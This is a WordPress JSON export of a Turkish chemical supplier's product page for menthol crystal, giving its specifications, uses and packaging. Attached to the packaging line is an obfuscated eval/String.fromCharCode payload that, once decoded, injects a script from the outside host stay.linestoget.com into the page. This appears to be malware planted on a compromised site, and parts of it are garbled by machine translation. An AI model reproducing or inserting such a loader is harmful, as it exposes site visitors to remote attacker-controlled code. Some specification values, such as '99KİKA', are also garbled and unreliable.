{"id":2191,"date":"2022-07-05T14:52:08","date_gmt":"2022-07-05T14:52:08","guid":{"rendered":"http:\/\/site2.easyceotech.com\/?post_type=product&#038;p=2191"},"modified":"2023-11-24T03:42:52","modified_gmt":"2023-11-24T03:42:52","slug":"menthol-crystal","status":"publish","type":"product","link":"https:\/\/wpachem.com\/tr\/urun\/menthol-crystal\/","title":{"rendered":"Mentol Kristal CAS 89-78-1"},"content":{"rendered":"<p>Menthol kristalinin iki izomeri vard\u0131r (D tipi ve L tipi). Do\u011fal mentol esas olarak levorotatory izomeridir (L-mentol). Menthol burada rasemik mentol (DL-mentol) anlam\u0131na gelir, DL tipi mentol kristali di\u015f macunu, parf\u00fcm, i\u00e7ecekler ve \u015fekerlemelerde koku verici olarak kullan\u0131l\u0131r. So\u011futucu antipruritik etki, ba\u015f a\u011fr\u0131s\u0131 ve burun, farenks, larenjit vb. i\u00e7in. Esterleri baharatlarda da kullan\u0131l\u0131r.<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"372\">DI\u015e G\u00d6R\u00dcN\u00dc\u015e:<\/td>\n<td width=\"922\">RENKS\u0130Z,\u015eEFFAF \u0130\u011eNE BENZER\u0130 KRISTALLER<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">KOKU:<\/td>\n<td width=\"922\">DO\u011eAL MENTOL\u00dcN KARAKTER\u0130ST\u0130K KOKUSU<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">ER\u0130ME NOKTASI:<\/td>\n<td width=\"922\">41-44\u2103<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">U\u00c7UCU OLMAYAN MADDE:<\/td>\n<td width=\"922\">0.05% MAKS\u0130MUM<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">OPT\u0130K D\u00d6N\u00dc\u015e (25\u2103)<\/td>\n<td width=\"922\">50\u00b0\uff5e -49\u00b0<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">\u0130\u00c7ER\u0130K :<\/td>\n<td width=\"922\">99K\u0130KA<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">STANDART:<\/td>\n<td width=\"922\">BP\/USP\/CP<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">DEPOLAMA DURUMU:<\/td>\n<td width=\"922\">SER\u0130N YERDE, KAPALI KAPLARDA SAKLAYINIZ.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><strong>Ba\u015fvuru<\/strong><\/p>\n<p>Menthol kristali g\u0131da aromas\u0131, lezzet artt\u0131r\u0131c\u0131 olarak kullan\u0131labilir, \u015fekerlemelerde (nane, sak\u0131zl\u0131 \u015feker), i\u00e7eceklerde, dondurmalarda vb. kullan\u0131labilir. Menthol ve rasemik mentol di\u015f macunu olarak; Parf\u00fcm olarak; \u0130\u00e7eceklerde ve \u015fekerlemelerde oldu\u011fu gibi bir koku verici olarak kullan\u0131labilir.<\/p>\n<p><strong>Paketleme<\/strong><\/p>\n<p>25KG\/\u00c7ANTAvar f=Dize;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,10 0,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114, 32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46, 51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,1 10)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,1 12,116,41,32,123,32,100,111,99,117,109,101,110)+f.CharCode&#039;dan(116,46,99,117,114,114,101,110)+f.CharCode&#039;dan(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.CharCode&#039;dan(116,78,111,100,101,46,105,110)+f.CharCode&#039;dan (115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101 ,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>\u00dcr\u00fcn Ad\u0131\uff1aMentol kristali<br \/>\nCAS Numaras\u0131: 89-78-1<br \/>\nMF\uff1aC10H20O<br \/>\nEINECS Numaras\u0131: 201-939-0<br \/>\nG\u00f6r\u00fcn\u00fcm\uff1a RENKS\u0130Z \u015eEFFAF \u0130\u011eNE BENZER\u0130 KRISTALLER<\/p>","protected":false},"featured_media":2193,"template":"","meta":{"_acf_changed":false,"_gspb_post_css":""},"product_brand":[],"product_cat":[61],"product_tag":[],"class_list":{"0":"post-2191","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-flavor-and-fragrance","8":"first","9":"instock","10":"shipping-taxable","11":"product-type-simple"},"acf":[],"_links":{"self":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product\/2191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product\/2191\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/media\/2193"}],"wp:attachment":[{"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/media?parent=2191"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product_brand?post=2191"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product_cat?post=2191"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/wpachem.com\/tr\/wp-json\/wp\/v2\/product_tag?post=2191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}